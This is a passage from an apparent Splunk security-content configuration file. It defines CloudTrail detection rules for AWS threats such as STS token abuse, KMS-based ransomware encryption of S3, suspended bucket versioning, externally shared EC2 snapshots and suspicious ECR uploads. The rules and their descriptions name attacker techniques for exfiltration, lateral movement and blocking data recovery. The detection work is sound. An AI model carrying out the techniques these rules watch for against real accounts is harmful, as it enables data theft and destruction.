
= 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` user_type=AssumedRole userIdentity.sessionContext.sessionIssuer.type=Role | table sourceIPAddress userIdentity.arn user_agent user_access_key status action requestParameters.roleName responseElements.role.roleName responseElements.role.createDate | `aws_detect_sts_assume_role_abuse_filter` [ESCU - aws detect sts get session token abuse - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of suspicious use of sts:GetSessionToken. These tokens can be created on the go and used by attackers to move laterally and escalate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of suspicious use of sts:GetSessionToken. These tokens can be created on the go and used by attackers to move laterally and escalate privileges. action.escu.how_to_implement = You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Sts:GetSessionToken can be very noisy as in certain environments numerous calls of this type can be executed. This search can be adjusted to provide specific values to identify cases of abuse. In specific environments the use of field requestParameters.serialNumber will need to be used. 
action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect sts get session token abuse - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect sts get session token abuse - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` ASIA userIdentity.type=IAMUser| spath eventName | search eventName=GetSessionToken | table sourceIPAddress eventTime userIdentity.arn userName userAgent user_type status region | `aws_detect_sts_get_session_token_abuse_filter` [ESCU - AWS Detect Users creating keys with encrypt policy without MFA - Rule] action.escu = 0 action.escu.enabled = 1 description = This search provides detection of KMS keys where action kms:Encrypt is accessible for everyone (also outside of your organization). This is an indicator that your account is compromised and the attacker uses the encryption key to compromise another company. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of KMS keys where action kms:Encrypt is accessible for everyone (also outside of your organization). This is an indicator that your account is compromised and the attacker uses the encryption key to compromise another company. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs action.escu.known_false_positives = unknown action.escu.creation_date = 2021-01-11 action.escu.modification_date = 2021-01-11 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Detect Users creating keys with encrypt policy without MFA - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Ransomware Cloud"] action.risk = 1 action.risk.param._risk_message = AWS account is potentially compromised and user $userIdentity.principalId$ is trying to compromise other accounts. 
action.risk.param._risk = [{"risk_object_field": "userIdentity.principalId", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Detect Users creating keys with encrypt policy without MFA - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware Cloud"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search provides detection of KMS keys where action kms:Encrypt is accessible for everyone (also outside of your organization). This is an indicator that your account is compromised and the attacker uses the encryption key to compromise another company. 
action.notable.param.rule_title = AWS Detect Users creating keys with encrypt policy without MFA
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=CreateKey OR eventName=PutKeyPolicy | spath input=requestParameters.policy output=key_policy_statements path=Statement{} | mvexpand key_policy_statements | spath input=key_policy_statements output=key_policy_action_1 path=Action | spath input=key_policy_statements output=key_policy_action_2 path=Action{} | eval key_policy_action=mvappend(key_policy_action_1, key_policy_action_2) | spath input=key_policy_statements output=key_policy_principal path=Principal.AWS | search key_policy_action="kms:Encrypt" AND key_policy_principal="*" | stats count min(_time) as firstTime max(_time) as lastTime by eventName eventSource eventID awsRegion userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_detect_users_creating_keys_with_encrypt_policy_without_mfa_filter`

[ESCU - AWS Detect Users with KMS keys performing encryption S3 - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search provides detection of users with KMS keys performing encryption specifically against S3 buckets.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides detection of users with KMS keys performing encryption specifically against S3 buckets.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = There may be buckets provisioned with S3 encryption.
action.escu.creation_date = 2022-11-11
action.escu.modification_date = 2022-11-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Detect Users with KMS keys performing encryption S3 - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Ransomware Cloud"]
action.risk = 1
action.risk.param._risk_message = User $user$ with KMS keys is performing encryption against S3 buckets on these files $dest_file$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "dest_file", "risk_object_type": "other", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Detect Users with KMS keys performing encryption S3 - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware Cloud"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=CopyObject requestParameters.x-amz-server-side-encryption="aws:kms" | rename requestParameters.bucketName AS bucketName, requestParameters.x-amz-copy-source AS src_file, requestParameters.key AS dest_file | stats count min(_time) as firstTime max(_time) as lastTime values(bucketName) as bucketName values(src_file) AS src_file values(dest_file) AS dest_file values(userAgent) AS userAgent values(region) AS region values(src) AS src by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_detect_users_with_kms_keys_performing_encryption_s3_filter`

[ESCU - AWS Disable Bucket Versioning - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects AWS CloudTrail events where bucket versioning is suspended by a user. Versioning allows AWS administrators to maintain different versions of the S3 bucket which can be used to recover deleted data. Adversaries have leveraged this technique in the wild during a ransomware incident to disable versioning so the client cannot recover the data.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects AWS CloudTrail events where bucket versioning is suspended by a user. Versioning allows AWS administrators to maintain different versions of the S3 bucket which can be used to recover deleted data. Adversaries have leveraged this technique in the wild during a ransomware incident to disable versioning so the client cannot recover the data.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that an AWS administrator has legitimately disabled versioning on certain buckets to avoid costs.
action.escu.creation_date = 2023-05-01
action.escu.modification_date = 2023-05-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Disable Bucket Versioning - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS S3 Activities", "Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = Bucket Versioning is suspended for S3 buckets $bucket_name$ by user $user_arn$ from IP address $src_ip$
action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Disable Bucket Versioning - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=PutBucketVersioning "requestParameters.VersioningConfiguration.Status"=Suspended | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.bucketName) as bucket_name values(resources{}.ARN) as resource_arn by src_ip aws_account_id awsRegion eventName userAgent user_arn userIdentity.principalId errorCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_disable_bucket_versioning_filter`

[ESCU - AWS EC2 Snapshot Shared Externally - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes AWS CloudTrail events to identify when an EC2 snapshot's permissions are modified to be shared with a different AWS account. This method is used by adversaries to exfiltrate the EC2 snapshot.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes AWS CloudTrail events to identify when an EC2 snapshot's permissions are modified to be shared with a different AWS account. This method is used by adversaries to exfiltrate the EC2 snapshot.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that an AWS admin has legitimately shared a snapshot with others for a specific purpose.
action.escu.creation_date = 2023-03-20
action.escu.modification_date = 2023-03-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS EC2 Snapshot Shared Externally - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious Cloud Instance Activities", "Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = AWS EC2 snapshot from account $aws_account_id$ is shared with $requested_account_id$ by user $user_arn$ from $src_ip$
action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 48}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS EC2 Snapshot Shared Externally - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes AWS CloudTrail events to identify when an EC2 snapshot's permissions are modified to be shared with a different AWS account. This method is used by adversaries to exfiltrate the EC2 snapshot.
action.notable.param.rule_title = AWS EC2 Snapshot Shared Externally
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=ModifySnapshotAttribute | rename requestParameters.createVolumePermission.add.items{}.userId as requested_account_id | search requested_account_id != NULL | eval match=if(requested_account_id==aws_account_id,"Match","No Match") | table _time user_arn src_ip requestParameters.attributeType requested_account_id aws_account_id match vendor_region user_agent userIdentity.principalId | where match = "No Match" | `aws_ec2_snapshot_shared_externally_filter`

[ESCU - AWS ECR Container Scanning Findings High - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-11-09
action.escu.modification_date = 2023-11-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS ECR Container Scanning Findings High - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Vulnerabilities with severity high found in repository $repository$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 70}, {"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 70}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS ECR Container Scanning Findings High - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results.
action.notable.param.rule_title = AWS ECR Container Scanning Findings High
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings | search severity=HIGH | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_high_filter`

[ESCU - AWS ECR Container Scanning Findings Low Informational Unknown - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-11-09
action.escu.modification_date = 2023-11-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS ECR Container Scanning Findings Low Informational Unknown - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Vulnerabilities with severity $severity$ found in repository $repository$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 5}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS ECR Container Scanning Findings Low Informational Unknown - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings | search severity IN ("LOW", "INFORMATIONAL", "UNKNOWN") | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="low" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_low_informational_unknown_filter`

[ESCU - AWS ECR Container Scanning Findings Medium - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-11-09
action.escu.modification_date = 2023-11-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS ECR Container Scanning Findings Medium - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Vulnerabilities with severity $severity$ found in repository $repository$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 21}, {"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 21}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS ECR Container Scanning Findings Medium - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings | search severity=MEDIUM | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="medium" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_medium_filter`

[ESCU - AWS ECR Container Upload Outside Business Hours - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). An upload of a new container is normally done during business hours. When done outside business hours, we want to take a look into it.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). An upload of a new container is normally done during business hours. When done outside business hours, we want to take a look into it.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = When your development is spread across different time zones, applying this rule can be difficult.
action.escu.creation_date = 2023-11-09
action.escu.modification_date = 2023-11-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS ECR Container Upload Outside Business Hours - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Container uploaded outside business hours from $user$
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS ECR Container Upload Outside Business Hours - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=PutImage date_hour>=20 OR date_hour<8 OR date_wday=saturday OR date_wday=sunday | rename requestParameters.* as * | rename repositoryName AS repository | eval phase="release" | eval severity="medium" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, user, userName, src_ip, imageTag, registryId, repository, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_upload_outside_business_hours_filter`

[ESCU - AWS ECR Container Upload Unknown User - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). An upload of a new container is normally done from only a few known users. When the user was never seen before, we should have a closer look into the event.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). An upload of a new container is normally done from only a few known users. When the user was never seen before, we should have a closer look into the event.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-08-19
action.escu.modification_date = 2021-08-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS ECR Container Upload Unknown User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Container uploaded from unknown user $user$
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS ECR Container Upload Unknown User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=PutImage NOT `aws_ecr_users` | rename requestParameters.* as * | rename repositoryName AS image | eval phase="release" | eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, user, userName, src_ip, imageTag, registryId, image, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_upload_unknown_user_filter`

[ESCU - AWS Excessive Security Scanning - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events and analyses the number of distinct eventNames starting with Describe issued by a single user. This indicates that this user scans the configuration of your AWS cloud environment.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events and analyses the number of distinct eventNames starting with Describe issued by a single user. This indicates that this user scans the configuration of your AWS cloud environment.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = This search has no known false positives.
action.escu.creation_date = 2021-04-13
action.escu.modification_date = 2021-04-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Excessive Security Scanning - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS User Monitoring"]
action.risk = 1
action.risk.param._risk_message = User $user$ has an excessive number of API calls $dc_events$ from these IP addresses $src$, violating the threshold of 50, using the following commands $command$.
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 18}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Excessive Security Scanning - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for AWS CloudTrail events and analyses the number of distinct eventNames starting with Describe issued by a single user. This indicates that this user scans the configuration of your AWS cloud environment.
action.notable.param.rule_title = AWS Excessive Security Scanning
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=Describe* OR eventName=List* OR eventName=Get* | stats dc(eventName) as dc_events min(_time) as firstTime max(_time) as lastTime values(eventName) as command values(src) as src values(userAgent) as userAgent by user userIdentity.arn | where dc_events > 50 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_excessive_security_scanning_filter`

[ESCU - AWS Exfiltration via Anomalous GetObject API Activity - Rule]
action.escu = 0
action.escu.enabled = 1
